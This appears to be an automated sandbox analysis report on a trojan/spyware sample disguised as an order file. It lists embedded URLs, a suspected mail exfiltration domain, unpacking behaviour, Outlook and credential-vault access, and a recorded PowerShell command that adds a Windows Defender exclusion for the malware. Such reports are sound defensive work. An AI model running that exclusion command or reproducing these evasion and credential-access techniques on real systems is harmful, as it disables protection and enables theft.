                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: mail.mbarieservicesltd.com
                        Source: ORDER#023_2024.exeString found in binary or memory: http://localhost/arkanoid_server/requests.php
                        Source: ORDER#023_2024.exe, 00000005.00000002.2905038066.000000000305A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mbarieservicesltd.com
                        Source: ORDER#023_2024.exe, 00000000.00000002.1679554005.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

                        System Summary

                        barindex
                        Initial sample is a PE file and has a suspicious name
                        Source: initial sampleStatic PE information: Filename: ORDER#023_2024.exe
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 0_2_02A3DF140_2_02A3DF14
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 0_2_06F548D80_2_06F548D8
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 0_2_06F556280_2_06F55628
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 0_2_06F535B00_2_06F535B0
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 0_2_06F5A1880_2_06F5A188
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 0_2_06F53E200_2_06F53E20
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 0_2_06F55FD80_2_06F55FD8
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 0_2_06F55FCB0_2_06F55FCB
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 0_2_06F539E80_2_06F539E8
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 5_2_014C41405_2_014C4140
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 5_2_014C4D585_2_014C4D58
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 5_2_014C44885_2_014C4488
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 5_2_067F8F685_2_067F8F68
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 5_2_067FF5905_2_067FF590
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 5_2_067F2B585_2_067F2B58
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 5_2_067FA8905_2_067FA890
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 5_2_067FE1BB5_2_067FE1BB
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 5_2_067F869B5_2_067F869B
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 5_2_067F5C315_2_067F5C31
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 5_2_06841CB05_2_06841CB0
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 5_2_068439085_2_06843908
                        Source: ORDER#023_2024.exe, 00000000.00000002.1679554005.0000000002B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs ORDER#023_2024.exe
                        Source: ORDER#023_2024.exe, 00000000.00000002.1689046037.00000000053D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs ORDER#023_2024.exe
                        Source: ORDER#023_2024.exe, 00000000.00000002.1692813648.00000000076F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs ORDER#023_2024.exe
                        Source: ORDER#023_2024.exe, 00000000.00000002.1679554005.0000000002B81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs ORDER#023_2024.exe
                        Source: ORDER#023_2024.exe, 00000000.00000002.1678208666.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ORDER#023_2024.exe
                        Source: ORDER#023_2024.exe, 00000000.00000002.1681703639.0000000003B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs ORDER#023_2024.exe
                        Source: ORDER#023_2024.exe, 00000000.00000002.1681703639.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs ORDER#023_2024.exe
                        Source: ORDER#023_2024.exe, 00000000.00000002.1681703639.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs ORDER#023_2024.exe
                        Source: ORDER#023_2024.exe, 00000000.00000000.1651295321.0000000000762000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJmYB.exe0 vs ORDER#023_2024.exe
                        Source: ORDER#023_2024.exe, 00000005.00000002.2903371766.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs ORDER#023_2024.exe
                        Source: ORDER#023_2024.exe, 00000005.00000002.2903789840.00000000010F8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs ORDER#023_2024.exe
                        Source: ORDER#023_2024.exeBinary or memory string: OriginalFilenameJmYB.exe0 vs ORDER#023_2024.exe
                        Source: ORDER#023_2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: ORDER#023_2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, g58dCb1xNyIgM5il43.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, LCgYKpJHO2S8TItW51.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, LCgYKpJHO2S8TItW51.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, LCgYKpJHO2S8TItW51.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, LCgYKpJHO2S8TItW51.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, LCgYKpJHO2S8TItW51.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, LCgYKpJHO2S8TItW51.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, g58dCb1xNyIgM5il43.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/6@3/1
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER#023_2024.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_03
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ma5vwock.gkh.ps1Jump to behavior
                        Source: ORDER#023_2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: ORDER#023_2024.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: ORDER#023_2024.exeReversingLabs: Detection: 65%
                        Source: unknownProcess created: C:\Users\user\Desktop\ORDER#023_2024.exe "C:\Users\user\Desktop\ORDER#023_2024.exe"
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe"
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess created: C:\Users\user\Desktop\ORDER#023_2024.exe "C:\Users\user\Desktop\ORDER#023_2024.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess created: C:\Users\user\Desktop\ORDER#023_2024.exe "C:\Users\user\Desktop\ORDER#023_2024.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess created: C:\Users\user\Desktop\ORDER#023_2024.exe "C:\Users\user\Desktop\ORDER#023_2024.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess created: C:\Users\user\Desktop\ORDER#023_2024.exe "C:\Users\user\Desktop\ORDER#023_2024.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: iconcodecservice.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: ORDER#023_2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: ORDER#023_2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        .NET source code contains potential unpacker
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, LCgYKpJHO2S8TItW51.cs.Net Code: e2sKbhnwKs System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.ORDER#023_2024.exe.53d0000.4.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, LCgYKpJHO2S8TItW51.cs.Net Code: e2sKbhnwKs System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.ORDER#023_2024.exe.3ba1d60.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 0_2_02A3EE60 push esp; iretd 0_2_02A3EE61
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 0_2_06F51711 push eax; iretd 0_2_06F5171D
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 5_2_014CFAC1 push es; ret 5_2_014CFAD0
